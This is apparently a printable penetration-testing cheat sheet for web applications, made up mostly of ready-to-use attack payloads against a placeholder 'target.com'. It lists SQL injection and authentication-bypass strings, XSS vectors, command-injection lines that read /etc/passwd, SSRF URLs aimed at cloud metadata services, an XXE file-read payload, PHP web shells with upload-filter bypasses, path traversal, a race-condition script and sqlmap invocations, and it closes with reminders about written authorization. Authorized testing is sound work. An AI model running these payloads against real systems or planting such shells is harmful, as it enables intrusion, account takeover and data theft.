Quick Reference Card - Keep This Open During Testing
subfinder -d target.com -o subs.txt httpx -l subs.txt -title -tech-detect -o live.txt
whatweb -v target.com curl -I https://target.com
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,401,403
site:target.com filetype:pdf site:target.com inurl:admin site:target.com ext:sql OR ext:env
# Directory bruteforce feroxbuster -u https://target.com -w wordlist.txt -x php,html,js # JavaScript analysis python3 linkfinder.py -i https://target.com/app.js -o cli # Parameter discovery arjun -u https://target.com/endpoint
Username: admin' OR '1'='1' -- Password: anything
admin:admin, root:root, test:test
jwt_tool <TOKEN> -X k -pk public.pem
# Your ID: 123, test accessing: 124, 125, 126... GET /api/user/123/profile GET /api/user/124/profile # Try all HTTP methods curl -X POST /api/user/124/profile curl -X PUT /api/user/124/profile curl -X DELETE /api/user/124/profile
POST /api/user/update
{"role": "admin", "is_admin": true}
# Basic ' OR '1'='1' -- ' UNION SELECT NULL,NULL,NULL -- # Time-based blind ' AND SLEEP(5) -- ' AND IF(1=1, SLEEP(5), 0) -- # Boolean-based ' AND 1=1 -- (True) ' AND 1=2 -- (False)
sqlmap -u "https://target.com/page?id=1" --batch --dbs sqlmap -r request.txt --batch --dbs --level=5 --risk=3
<script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <iframe src=javascript:alert(1)>
<ScRiPt>alert(1)</sCrIpT> <body onload=alert(1)> <svg/onload=alert(1)>
; ls | cat /etc/passwd && whoami `id` $(whoami) # Blind (time-based) ; sleep 10 | ping -c 10 127.0.0.1
http://127.0.0.1 http://localhost http://169.254.169.254/latest/meta-data/ http://metadata.google.internal/ # Bypass techniques http://127.1 http://[::1] http://127.0.0.1.nip.io
<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root> <data>&xxe;</data> </root>
# PHP shell <?php system($_GET['cmd']); ?> # With GIF header bypass GIF89a<?php system($_GET['cmd']); ?> # Extension bypass shell.php.jpg shell.php%00.jpg shell.PhP
../../shell.php ..%2F..%2Fshell.php
../../../../etc/passwd ../../../../var/log/apache2/access.log # PHP wrappers php://filter/convert.base64-encode/resource=index.php data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
import concurrent.futures, requests
def req():
return requests.post('https://target.com/redeem',
data={'code': 'GIFT100'})
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as ex:
[ex.submit(req) for _ in range(20)]
curl -X POST https://target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name } } }"}'
{"username": "test", "is_admin": true, "role": "admin"}
curl https://target.com/api/v1/users curl https://target.com/api/v2/users
| Parameter | Vulnerability Type |
|---|---|
| ?id= | SQL Injection, IDOR |
| ?url= | SSRF |
| ?file= | LFI/RFI |
| ?page= | LFI |
| ?redirect= | Open Redirect |
| ?callback= | JSONP Hijacking |
| ?email= | Email Header Injection |
| ?search= | XSS, SQL Injection |
| ?image= | SSRF |
| ?template= | SSTI |
| Severity | Score | Examples |
|---|---|---|
| CRITICAL | 9.0-10.0 | Unauthenticated RCE, SQL injection with admin access, Authentication bypass |
| HIGH | 7.0-8.9 | Authenticated RCE, Privilege escalation, Sensitive data exposure |
| MEDIUM | 4.0-6.9 | IDOR, Stored XSS, CSRF on sensitive functions |
| LOW | 0.1-3.9 | Information disclosure, Missing security headers, Reflected XSS (limited impact) |
## [Vulnerability Name] **Severity:** Critical/High/Medium/Low ### Steps to Reproduce: 1. Navigate to https://target.com/login 2. Enter payload: admin' OR '1'='1' -- 3. Click login button 4. Access granted as admin user ### Evidence: [Screenshot attached] ### HTTP Request: POST /login HTTP/1.1 Host: target.com username=admin'+OR+'1'='1'+--&password=test ### Impact: Complete authentication bypass, unauthorized access to any account ### Remediation: • Use parameterized queries/prepared statements • Implement input validation and sanitization • Apply principle of least privilege
nuclei -u https://target.com -tags cve,exposure nuclei -l urls.txt -c 50
sqlmap -u "URL" --batch --dbs sqlmap -r request.txt --level=5 --risk=3
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 ffuf -u https://target.com/api/FUZZ -w api-wordlist.txt -H "Authorization: Bearer TOKEN"
curl -I https://target.com # Headers only
curl -X POST https://target.com/api -d '{"key":"value"}'
curl -H "Authorization: Bearer TOKEN" https://target.com/api
| Engagement Type | Time Allocation |
|---|---|
| 40-Hour Engagement |
Day 1: Recon + Mapping (8h) Day 2: Auth + Authz testing (8h) Day 3: Injection vulnerabilities (8h) Day 4: Business logic + APIs (8h) Day 5: Exploitation + Reporting (8h) |
| 8-Hour Quick Test |
0-1h: Reconnaissance 1-3h: Manual exploration 3-6h: Vulnerability testing (high-impact focus) 6-8h: Documentation |
✓ Get WRITTEN AUTHORIZATION FIRST
✓ Define clear scope boundaries
✓ Maintain professional communication
✓ Document EVERYTHING
✓ Demonstrate ethical behavior
✓ Stop immediately if unsure
✓ Notify client of critical findings
Your professional reputation is on the line.
Test responsibly and ethically.
Print this reference card.
Keep it next to your monitor.
Reference it constantly during testing.
Now go find those bugs! 🎯